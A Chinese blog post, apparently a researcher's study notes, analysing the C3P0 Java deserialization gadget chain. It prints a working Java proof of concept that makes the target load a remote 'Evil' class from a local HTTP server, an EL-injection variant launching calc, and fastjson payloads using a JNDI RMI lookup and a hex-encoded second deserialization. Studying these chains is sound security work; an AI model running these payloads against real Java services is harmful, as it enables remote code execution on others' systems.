Javaweb安全——反序列化漏洞-C3P0链

最新推荐文章于 2024-05-27 09:53:12 发布
最新推荐文章于 2024-05-27 09:53:12 发布
阅读量2.1k 收藏 1
点赞数
分类专栏: JavaWeb安全 文章标签: web安全 安全 ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43610673/article/details/127505398
版权

C3P0反序列化链

C3P0是一个开源的JDBC连接池,它实现了数据源与JNDI绑定,支持JDBC3规范和实现了JDBC2的标准扩展说明的Connection和Statement池的DataSources对象。

即将用于连接数据库的连接整合在一起形成一个随取随用的数据库连接池(Connection pool)。

ysoserial代码注释中的调用链如下:

com.sun.jndi.rmi.registry.RegistryContext->lookup
com.mchange.v2.naming.ReferenceIndirector$ReferenceSerialized->getObject
com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase->readObject

自下向上的调用,从lookup看着像一个jndi注入,调用链比较短,直接静态审计源码试试。com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase#readObject还原connectionPoolDataSource属性赋值

image-20221024155902626

跟到com.mchange.v2.naming.ReferenceIndirector的内部类的方法ReferenceSerialized#getObject,可见是有个jndi,不过仔细查看源码发现contextName其实是不可控的。

image-20221024193017266

看一下com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase#writeObject的流程,了解connectionPoolDataSource属性是怎么序列化的。

先try反序列化connectionPoolDataSource属性,但这个属性connectionPoolDataSource是ConnectionPoolDataSource类的没有实现 Serializable,并不能反序列化

image-20221024201331791

接着会抛出异常进入catch,产生1个Reference对象,然后再将他作为ReferenceSerialized类的属性。

image-20221024201209807

所以说只有reference属性是可控的。

image-20221024201702477

远程类加载

reference属性可控的话com.mchange.v2.naming.ReferenceIndirector$ReferenceSerialized#getObject中还有个点就可以利用了

image-20221024202209331

com.mchange.v2.naming.ReferenceableUtils#referenceToObject

image-20221024202337694

写个自定义类PoolSource实现ConnectionPoolDataSource, Referenceable接口即可

import com.mchange.v2.c3p0.PoolBackedDataSource;
import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;

import javax.naming.NamingException;
import javax.naming.Reference;
import javax.naming.Referenceable;
import javax.sql.ConnectionPoolDataSource;
import javax.sql.PooledConnection;
import java.io.*;
import java.lang.reflect.Field;
import java.sql.SQLException;
import java.sql.SQLFeatureNotSupportedException;
import java.util.logging.Logger;

public class C3P0 {
    public static void main(String[] args) throws Exception {
        String className = "Evil";
        String url = "http://127.0.0.1:7999/";
        PoolBackedDataSource o = new PoolBackedDataSource();
        Field field = PoolBackedDataSourceBase.class.getDeclaredField("connectionPoolDataSource");
        field.setAccessible(true);
        field.set(o, new PoolSource(className, url));

        // 生成序列化字符串
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(o);
        oos.close();

        // 本地测试触发
        System.out.println(barr);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o0 = (Object)ois.readObject();
    }

    private static final class PoolSource implements ConnectionPoolDataSource, Referenceable {

        private String className;
        private String url;

        public PoolSource ( String className, String url ) {
            this.className = className;
            this.url = url;
        }

        public Reference getReference () throws NamingException {
            return new Reference("test", this.className, this.url);
        }

        public PrintWriter getLogWriter () throws SQLException {return null;}
        public void setLogWriter ( PrintWriter out ) throws SQLException {}
        public void setLoginTimeout ( int seconds ) throws SQLException {}
        public int getLoginTimeout () throws SQLException {return 0;}
        public Logger getParentLogger () throws SQLFeatureNotSupportedException {return null;}
        public PooledConnection getPooledConnection () throws SQLException {return null;}
        public PooledConnection getPooledConnection ( String user, String password ) throws SQLException {return null;}

    }
}

image-20221024204810910

BeanFactory本地工厂类

上面的利用链因为要用到URLClassLoader,所以在高版本jdk以及不出网的条件下无法利用。

com.mchange.v2.naming.ReferenceableUtils#referenceToObject这还有一个利用点

image-20221024205438152

很容易想到jndi高版本注入用过的BeanFactory#getObjectInstance

image-20221024212004772

修改一下getReference方法返回的ref对象即可

        public Reference getReference () throws NamingException {
            ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
            ref.add(new StringRefAddr("forceString", "test=eval"));
            ref.add(new StringRefAddr("test", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['cmd','/c','calc']).start()\")"));
            return ref;
        }

image-20221024213307908

fastjson中的利用

jndi注入

代替JdbcRowSetImpl链使用

com.mchange.v2.c3p0.JndiRefForwardingDataSource#dereference还有个jndi的点

image-20221024213620815

这个方法只有一个调用

image-20221024213752481

找调用了 inner() 的setter 方法做跳板。

image-20221024214048378

{"@type":"com.mchange.v2.c3p0.JndiRefForwardingDataSource","jndiName":"rmi://127.0.0.1:1099/badClassName", "loginTimeout":0}

二次反序列化

Fastjson的低版本可用(<= 1.2.47)。

先看poc:

{"e":{"@type":"java.lang.Class","val":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"},"f":{"@type":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource","userOverridesAsString":"HexAsciiSerializedMap:hex编码内容;"}}

跟进com.mchange.v2.c3p0.WrapperConnectionPoolDataSource#setUpPropertyListeners这个方法,其在构造方法中调用

image-20221024220120577

该方法自定义了一个监听器重写了vetoableChange方法

image-20221024220221653

查看重写的vetoableChange方法,可见监听两个属性名:

  • connectionTesterClassName 属性通过recreateConnectionTester方法重新实例化一个 ConnectionTester 对象也就无法被利用了

  • userOverridesAsString属性使用 C3P0ImplUtils.parseUserOverridesAsString*来处理NewValue。
    截取从 HexAsciiSerializedMap 后的第二位到倒数第二位 中间的hex字符串,可以构造形如 HexAsciiSerializedMap:hex_code; 的字符串

    image-20221024232322171

    image-20221024232403290

    然后调用SerializableUtils.fromByteArray方法进行二次反序列化

    image-20221024232504251

    image-20221024232515861

接着跟进userOverridesAsString属性的setter方法,

image-20221024235128606

再到java.beans.VetoableChangeSupport#fireVetoableChange(java.beans.PropertyChangeEvent)

image-20221024235253145

调用链如下:

com.mchange.v2.c3p0.impl.WrapperConnectionPoolDataSourceBase#setUserOverridesAsString
	java.beans.VetoableChangeSupport#fireVetoableChange(java.lang.String, java.lang.Object, java.lang.Object)
	java.beans.VetoableChangeSupport#fireVetoableChange(java.beans.PropertyChangeEvent)
	java.beans.VetoableChangeListener#vetoableChange
		com.mchange.v2.c3p0.impl.C3P0ImplUtils#parseUserOverridesAsString
			com.mchange.v2.ser.SerializableUtils#fromByteArray(byte[])
			com.mchange.v2.ser.SerializableUtils#deserializeFromByteArray

参考

https://www.cnblogs.com/CoLo/p/15850685.html#hex%E5%BA%8F%E5%88%97%E5%8C%96%E5%AD%97%E8%8A%82%E5%8A%A0%E8%BD%BD%E5%99%A8

https://blog.csdn.net/rfrder/article/details/123208761

Arnoldqqq
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java原生反序列化漏洞利用(URLDNS)
m0_55994898的博客
08-03 184
反序列化漏洞指在代码中存在不安全反序列化操作(可控的序列化数据流入了反序列化方法中),在绝大多数编程语言中通常都有序列化/反序列化的功能(例如PHP,Java,Python),在序列化/反序列化的过程中通常会自动调用一些固定的方法,在PHP中序列化/反序列化时会调用对应类中的。
C3P0 反序列化
01-26 605
C3P0 反序列化 依赖 <dependency> <groupId>com.mchange</groupId> <artifactId>c3p0</artifactId> <version>0.9.5.2</version> </dependency> Gadget /* * Gadget: * PoolBackedDataSourceBase#readObject *
Java 反序列化C3P0 学习
蚁景网安学院
10-10 753
图片有点多,请耐心阅读哦0x01 前言再多打一点基础吧,后续打算先看一看 XStream,Weblogic,strusts2 这些个0x02 C3P0 组件介绍C3P0 是一个开源的 JDBC 连接池,它实现了数据源和 JNDI 绑定,支持 JDBC3 规范和 JDBC2 的标准扩展。目前使用它的开源项目有 Hibernate,Spring 等。JDBC 是 Java DataBase Conne...
探索安全边界:fastjson-c3p0 利用工具深度解读与实践
最新发布
gitblog_00046的博客
05-27 278
探索安全边界:fastjson-c3p0 利用工具深度解读与实践 项目地址:https://gitcode.com/depycode/fastjson-c3p0 在当今的数字化时代,应用安全成为不容忽视的核心议题之一。特别是对于开发者而言,理解和防御潜在的安全漏洞是日常工作中不可或缺的一部分。今天,我们将一起深入探索一个针对 fastjson 结合 c3p0安全利用案例——fastjson-c...
[Java反序列化]—C3P0反序列化
Sentiment的博客
11-11 1381
文章首发于先知社区:https://xz.aliyun.com/t/11830
[Java反序列化]C3P0反序列化
feng的博客
03-01 625
[Java反序列化]C3PO反序列化 环境 <dependency> <groupId>com.mchange</groupId> <artifactId>c3p0</artifactId> <version>0.9.5.2</version> </dependency> 什么是c3p0 C3P0是一个开源的
Java安全(十五) 一些子之C3P0
WDWAGAAFGAGDADSA的博客
07-18 929
C3P0常见
C3P0接数据库
zhanghua_chinese的博客
05-26 117
package com.test.jdbc.util;    import java.sql.Connection;  import java.sql.PreparedStatement;  import java.sql.ResultSet;  import java.sql.SQLException;  import javax.sql.DataSource;  import com.mcha...
c3p0-config.xml
05-13
Hibernate框架,默认推荐使用C3P0作为连接池实现,一个开源的连接池。 拷贝c3p0的jar到lib目录 (c3p0-0.9.5.2.jar , mchange-commons-java-0.2.12.jar) 把配置文件c3p0.xmla拷贝到src目录下(配置文件名一定不能修改...
javaweb后端开发用到的c3p0jar包javaweb后端开发用到的c3p0jar包.rar
08-27
C3P0是一个开源的JDBC连接池,它实现了数据源和JNDI绑定,支持JDBC3规范和JDBC2的标准扩展。C3P0 jar包的使用可以显著提升应用程序的性能,因为它可以有效地重用数据库连接,减少创建和销毁连接的时间开销。 1. **...
c3p0配置文件和操作说明
12-24
**c3p0配置文件和操作说明** c3p0是一个开源的JDBC连接池,它实现了数据源和JNDI绑定,支持JDBC3规范和JDBC2的标准扩展。在Java Web应用中,c3p0能有效地管理数据库连接,提高应用性能,避免频繁创建和关闭数据库...
C3P0 fastjson log4j POI3.7+3.8 jar包资源
02-22
C3P0-0.9.0.4.jar fastjson1.2.2.jar log4j1.2.17.jar POI3.7+3.8.jar jar包资源
fastjson-c3p0:fastjson不出网回显利用
03-19
fastjson-c3p0 fastjson不出网回显利用 POST /json HTTP/1.1 Host: 127.0.0.1:8999 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate cmd: dir Acce
c3p0工具包
09-25
**C3P0工具包详解** C3P0是一个开源的JDBC连接池,它实现了数据源和JNDI绑定,支持JDBC3规范和JDBC2的标准扩展。这个工具包为Java Web开发者提供了一种高效、灵活的数据库连接管理方式,避免了数据库连接创建和释放...
javaWeb网上书城项目源码文档-小工具.zip
11-07
工欲善其事,必先利其器。下面我们来介绍一下在项目中要使用的小工具(itcast-tools-1.4.jar)。这个小工具底层使用了:  c3p0数据库连接池;  common-beanutils;  common-dbutils;  javaMail;
Java反序列化之URLDNS
m0_62466350的博客
05-28 740
URLDNS是java原生态的一条利用,通常用于存在反序列化漏洞进行验证的,因为是原生态,不存在什么版本限制。不限制jdk版本,使用Java内置类,对第三方依赖没有要求目标无回显,可以通过DNS请求来验证是否存在反序列化漏洞URLDNS利用,只能发起DNS请求,并不能进行其他利用这条路还是比较简单的,通常用于存在反序列化漏洞进行验证的,学好了才能更好的为后面打基础。
C3P0反序列化学习
虚幻私塾
04-21 1619
🚀 优质资源分享 🚀 学习路线指引(点击解锁) 知识定位 人群定位 🧡 Python实战微信订餐小程序 🧡 进阶级 本课程是python flask+微信小程序的完美结合,从项目搭建到腾讯云部署上线,打造一个全栈订餐系统。 💛Python量化交易实战💛 入门级 手把手带你打造一个易扩展、更安全、效率更高的量化交易系统 C3P0 c3p0第一次听闻是用于fastjson的回显上,大佬们总结三种方法,后面两种主要就是用于fastjson和jackjson的回显利用(注入内存马) http
[Java安全]C3P0反序列化不出网利用学习
Y4tacker的博客
10-13 1273
文章目录参考文章利用构造利用分析 参考文章 本文复现了雨了个雨师傅的文章,思路很好,看完以后其实和JNDI8u191后的绕过思路一致,这个等下再复现学习 利用构造 在昨天看了Ysoserial的基本过程以后其实这个就相对简单了,不一样的地方就是后面Ysoserial用了URLClassLoader,而这个是当前线程下的ClassLoader,曾经一直觉得没用,还是自己学的太少了,大佬想到通过Tomcat的getObjectInstance方法调用ELProcessor的eval方法实现表达式注入 p
[Java安全]Java反序列化C3P0之利用URLClassLoader
Y4tacker的博客
10-12 670
文章目录C3P0是什么实现不调用构造参数创建对象利用分析 C3P0是什么 C3P0是一个开源的JDBC连接池,它实现了数据源和JNDI绑定,支持JDBC3规范和JDBC2的标准扩展。目前使用它的开源项目有Hibernate,Spring等 实现不调用构造参数创建对象 这个东西在后面利用生成的过程中实现了,为什么ysoserial使用这个猜测是为了节省不必要的变量吧,payload更短 可以参考下这篇文章Java ReflectionFactory 利用分析 首先是生成的过程,前面部分分割最后一个:获取
javaWeb安全验证漏洞修复总结.doc
11-29
本文档是一份关于Java Web安全验证漏洞修复的详细总结,涵盖了多个常见的安全...这份文档提供了全面的Java Web安全漏洞修复指南,涵盖了从基础概念到具体实施方案,有助于Web开发者和安全人员有效提升系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值